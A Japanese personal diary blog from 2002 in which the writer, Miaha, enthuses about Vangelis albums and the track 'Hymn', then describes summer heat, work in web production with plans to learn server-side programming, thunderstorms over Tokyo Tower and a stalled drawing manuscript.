ともあれ、もうホントに感激でした。

探していたのは、ヴァンゲリスの曲 "HYMN"(讃歌)。
先日買ったアルバムは『PORTRAITS』、今回Getしたのは『THEMES ブレードランナー/ザ・ベリーベスト・オブ・ヴァンゲリス』。全英オープンこと、初期の "HYMN" は、このアルバムのほか『VOICES』にも入っているが、こちらの日本版は廃盤になっているとのこと。今回アルバムをGetするにあたり、先日見つけたヴァンゲリスのファンサイトの情報を参考にさせていただきました。ここでお礼を申しあげるのもなんなのですが、とてもためになりました。ありがとうございます(*⌒ω⌒*)

KAIさんKAIさん、ミァハは『ブレードランナー』を観たくなってきましたよ!! そして、KAIさんがお好きだと言う "Farewell" も聴きたいデス。なんか、ヴァンゲリスの曲って知らないうちにいろいろ聴いているものですね。ブレードランナーのエンド・タイトルズって、奇跡の救出ぢゃないですかぁ Σ(゜△゜) レスキュー911(参照:世界まる見えテレビ特捜部 by日本テレビ・笑)みたいな!! この手の番組でよくかかってますよね……
アルバムの1曲目がこれでして、ここでも思わずひとこと。「えっ!? これも? すごい……すごいよヴァンゲリス!!」<なれなれしい(笑)

あー。う〜もーヴァンゲリスはマヂにいろいろ聴いてみようと思います。喜多郎が大地や砂、風景、姫神が歴史や情景だとすると、ヴァンゲリスは大気とか、もっと人間の内面とリンクするような曲を作っている気がしました。こう考えると、おなじシンセ奏者でも、やっぱり曲には個性がありますね(⌒ー⌒)
余談ですが、『Farewell』の意味。わたくしめは、間違って思い込んでおりました。ラルクの曲に同タイトルものもがあるのですが、曲のイメージから、てっきり、"夕暮れ" や "黄昏" といった意味なのだと思っており(苦笑) なんか、この曲名だけでも切ない感じが。わたしは切な系がいちばんのツボなので、心引かれております。

以上、今回も音楽ネタでした♪


(020807 00:31 UP)


2002年08月05日(月) 『あ゛つ゛い゛。』のこと。

+なんだか、暑くてやる気無し全開パワー。集中力ナッシング。ここ1週間ほどずっとそんな感じで、仕事に打ち込めない。あまりに駄目なので、帰っても同じかもとか、いっそ夏休みをいただいてリフレッシュしたほうがいいか? とか、始終考えてる始末。仕事に関しては、自分にとって幸せすぎるような好環境なので、頑張りたいんだよ。だもんで、ダラダラとしてしまうことが自分的につらいのだった(^ー^;)

なんかねー…… 「どういう仕事なの? なにしてるの?」などと、仕事のことを友達に聞かれたりすると、わたしはいつもうまく説明できなくて、なんかこう、よくわからんウサンクサイ会社っぽく聞こえそうな感じになったりとか、まるで嘘を並べているような感じにしどろもどろになってしまうのだけど、全然そんなことは無くて、有能なひとたちに恵まれたなかで、わたしは自分なりに会社の役に立てるような、プロとして通用するような人間になってゆきたいと、地道にお仕事をしているのです。今はHTMLでのWeb制作が仕事の中心だけども、携帯用のサイトに関しても少しずつ勉強をし始めているし、今後は、動的なページを作っていくためのスキルも身に付けていくのだっ!! できるようになるかはともかく、興味のあることなので頑張ってみます(笑)<サーバサイドの仕組を覚えたりとか、JavaとかCSPを使えるようにするとかー (>w<)/

やー。うちの会社紹介してあげたいくらいよ、某さん。プログラミングに直接携わるひとは、やっぱりうちの会社でもすごく大変そうなんだけど。くれぐれも、体を壊さないようにね。十年選手の某さんなら、即戦力になって、わたしよりよっぽどいい人材だよなーとか遠い目をしてみたりとかして。あー。頑張ろ。地道に(こつこつやるしか・泣笑)

+それにしても、ここ数日のものすごい雷で「もう夏が終わるんか!?」という感じだったが(終わってほしいんですが。もういいっすよ暑さは堪能したから・苦笑)、まだまだしばらくは暑さが続いてしまう様子だ。雷(稲妻)は実は好きで、外に出て眺めちゃったりとか(笑)、わくわくしちゃうほうなんだけど、昨晩はあまりに凄くて、さすがにちょっと怖かった。毎回、なにが怖いって、落雷でパソコンが壊れることで、必ず電源を落としておきます。オシャカになってしまったらシャレになりません。自転車操業なんで、もうMac買えなくなるかも(笑)<笑えねェ。 昨夜は、雷をやり過ごしている時間を利用して、お風呂に入ってました。

雨もハンパじゃ無かった…… ライトアップされた東京タワーも霞んでいた。東京タワー方面に林立し始めた高層マンションの、頂上を濃紫の雲の中に溶かした闇色のさまは絵のようで、ファンタジイ世界の不吉な塔や魔の棲む世界を思わせた。これはこれで美しく、写真を撮りたかったけど、暗くて綺麗に写りそうもなく、雨が激しいうえに、外階段でカメラを構えてるとこに雷が落ちたらヤだなと思ったのでやめときました(^▽^;)

+雨が降ったあとの、清涼な空気が好きだ。雨上がりって、蒸し暑くなるときとイイ感じに涼しくなるときとがあるのはなぜなんだろう。風の有る無し? 蒸し暑い状態を、わたしは『熱帯雨林』と言う。ちなみに、熱帯植物園も『熱帯雨林』。「熱帯雨林行く?」(笑)<そういや、ここ数年行ってないな。熱帯の鳥と戯れることができるとこに行ってみたいなぁ。日本では無理?
昔、本屋でバイトをしていたとき、職場がものすごく暑くて、まるで熱帯雨林だ、と考えたことがあった。数年来の思想(笑) 暑さのほか、本は紙でできていて、突き詰めればそれは木だから、たくさんの本が並ぶ本屋は森だ、と思ったのだった。雨が無いけど( ̄ω ̄;) よくよく思い起こせば、わたしは以前からこういう妄想癖がありましたな……

+あーもう。今日は休んでもおんなじだったな。仕事になってません(苦笑) 原稿もまた描けなかったしなぁ。落書きはしているんだけども。K山さんが携帯を持ったので、今日初めてメールしました。初めてのメールが「原稿駄目でした」って嫌だ(泣) ごめんなさい。
今日は早く帰ろっと。長く居ても駄目なものは駄目です( ̄ー ̄;) もー。自分に納得がいかないよ。って、それはいつものことなんだけど。残暑お見舞いとかも描きたいんだけどなー。なー。うう。
それでは、今回はこの辺で。


(020805 17:23 UP)


書いてる人:ミァハ(双星たかはる)
[ 運営サイト | 灰色森灰十字mail ]




マイエンピツに追加